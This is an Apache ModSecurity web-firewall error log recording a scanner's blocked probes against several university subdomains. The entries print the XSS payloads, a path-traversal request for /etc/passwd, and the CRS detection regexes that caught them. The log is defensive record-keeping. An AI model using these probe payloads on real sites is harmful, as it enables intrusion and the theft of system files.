[Tue Aug 29 11:56:08.578987 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAApbUv0AAAAh"]
[Tue Aug 29 11:56:08.646664 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAq@sgYAAAAM"]
[Tue Aug 29 11:56:08.649650 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16aMCo-f0AAArB1xMAAAAV"]
[Tue Aug 29 11:56:08.668794 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAAqY6RoAAAAr"]
[Tue Aug 29 11:56:08.679855 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAArB1xQAAAAV"]
[Tue Aug 29 11:56:08.699677 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16aMCo-f0AAArB1xUAAAAV"]
[Tue Aug 29 11:56:08.712980 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16aMCo-f0AAAqY6RwAAAAr"]
[Tue Aug 29 11:56:09.679375 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/content/jw_allvideos/includes/download.php"] [unique_id "ZO16acCo-f0AAAqTv2gAAAAa"]
[Tue Aug 29 11:56:09.681569 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:count: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/goform/activate_process"] [unique_id "ZO16acCo-f0AAAq@sgsAAAAM"]
[Tue Aug 29 11:56:10.543876 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqTv2sAAAAa"]
[Tue Aug 29 11:56:10.563008 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApa-UEAAAAg"]
[Tue Aug 29 11:56:10.563131 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApbUw4AAAAh"]
[Tue Aug 29 11:56:10.566479 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAAq5@NEAAAAK"]
[Tue Aug 29 11:56:10.568168 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApXgscAAAAU"]
[Tue Aug 29 11:56:10.603121 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqeFkIAAAAx"]
[Tue Aug 29 11:56:10.604433 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAq@shAAAAAM"]
[Tue Aug 29 11:56:10.651853 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16asCo-f0AAApbUxAAAAAh"]
[Tue Aug 29 11:56:10.671999 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAApbUxEAAAAh"]
[Tue Aug 29 11:56:10.681483 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id "ZO16asCo-f0AAAqTv28AAAAa"]
[Tue Aug 29 11:56:11.552595 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAq5@NgAAAAK"]
[Tue Aug 29 11:56:11.552741 2023] [:error] [pid 2742] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAq2KfUAAAAE"]
[Tue Aug 29 11:56:11.560671 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAocyeYAAAAR"]
[Tue Aug 29 11:56:11.574009 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:returnTo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:returnTo: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login.html"] [unique_id "ZO16a8Co-f0AAAqY6ScAAAAr"]
[Tue Aug 29 11:56:11.587009 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1 onmouseover= found within ARGS:backurl: 1 onmouseover=alert(/document.domain/) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/plugins/template/login.php"] [unique_id "ZO16a8Co-f0AAAq@shcAAAAM"]
[Tue Aug 29 11:56:11.597421 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-symposium/get_album_item.php"] [unique_id 